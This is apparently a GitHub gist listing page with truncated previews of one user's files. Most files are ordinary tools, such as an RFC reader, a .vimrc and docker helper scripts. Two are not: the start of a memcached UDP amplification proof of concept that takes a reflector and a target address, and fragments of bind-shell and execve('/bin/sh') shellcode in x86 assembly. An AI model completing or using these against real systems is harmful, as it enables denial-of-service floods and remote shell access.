Anne Isabelle "Anya" Macedo retpolanne
🏳️⚧️
retpolanne
/ memcrashed_poc.py
Created
March 8, 2018 10:42
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import IP, Raw, send, UDP | |
| import sys | |
| cmd = '\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n' | |
| memcached_addr = sys.argv[1] | |
| target = sys.argv[2] | |
| iface = sys.argv[3] | |
| packet = IP( |
retpolanne
/ read-rfc.sh
Last active
April 12, 2018 14:08
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # The directory is different on arch, I'm too lazy to change it. | |
| # install doc-rfc before using it | |
| # https://news.ycombinator.com/item?id=16570470 | |
| RFCS_DIR="/usr/share/doc/RFC/" | |
| RFC_QUERIED=$1 | |
| echo "$(find $RFCS_DIR -name '*'$RFC_QUERIED'*')" | head -1 | xargs zmore |
retpolanne
/ bind_tcp.s
Last active
January 4, 2019 00:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # bugs - plugs to random port :/ | |
| # run netstat -tlnp | grep LISTEN before using | |
| .global _start | |
| .section .text | |
| _start: | |
| # socket syscall | |
| mov $0x66, %eax # syscall 102 - socketcall | |
| mov $1, %ebx # socketcall type 1 - socket |
retpolanne
/ .vimrc
Created
May 10, 2018 18:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| set nocompatible " be iMproved, required | |
| filetype off " required | |
| " set the runtime path to include Vundle and initialize | |
| set rtp+=~/.vim/bundle/Vundle.vim | |
| call vundle#begin() | |
| " alternatively, pass a path where Vundle should install plugins | |
| "call vundle#begin('~/some/path/here') | |
| " let Vundle manage Vundle, required |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .global _start | |
| .section .text | |
| _start: | |
| # execve syscall | |
| xor %eax, %eax | |
| push %eax # null byte for /bin/sh string | |
| push $0x68732f2f # little endian //sh | |
| push $0x6e69622f # little endian /bin |
retpolanne
/ compile-as.sh
Created
August 5, 2018 15:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| as --32 $1.s -o $1.o | |
| ld -m elf_i386 $1.o -o $1 |
retpolanne
/ gcc-docker
Created
August 5, 2018 15:47
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| docker run --rm -v "$PWD":/usr/src/assembly -w /usr/src/assembly gcc:4.9 $1 |
retpolanne
/ gcc-docker-it
Created
August 5, 2018 15:47
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| docker run --name gcc-docker --rm -v "$PWD":/usr/src/assembly -w /usr/src/assembly -it gcc:4.9 $1 |
retpolanne
/ gcc-docker-rettach
Created
August 5, 2018 15:47
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| docker exec -it gcc-docker /bin/bash |
retpolanne
/ gdb-docker-it
Last active
February 22, 2019 23:27
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| docker run --privileged --cap-add=SYS_PTRACE --name gdb-docker -v "$PWD":/usr/src/assembly -w /usr/src/assembly -it ubuntu:latest $1 |
OlderNewer